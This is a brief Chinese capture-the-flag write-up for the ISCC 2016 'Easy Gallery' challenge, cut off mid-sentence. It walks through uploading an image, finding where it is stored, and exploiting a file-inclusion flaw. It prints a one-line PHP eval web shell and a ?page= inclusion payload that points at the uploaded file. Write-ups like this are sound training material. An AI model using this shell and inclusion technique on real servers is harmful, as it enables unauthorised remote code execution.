ISCC 2016 Easy Gallery

Easy Gallery解题记录 首先进入发现有一个文件上传页面 先上传了一张.jpg文件 上传得到一个id 通过view页面可以查看到自己上传的图片,也可以看到图片的保存路径 多半是考文件包含 写入一句话木马<?php @eval($_GET['pass']);?> 发现?page可以插入payload:?page=./uploads/1581496316.jpg ./是当前目录,即http:/
相关文章
相关标签/搜索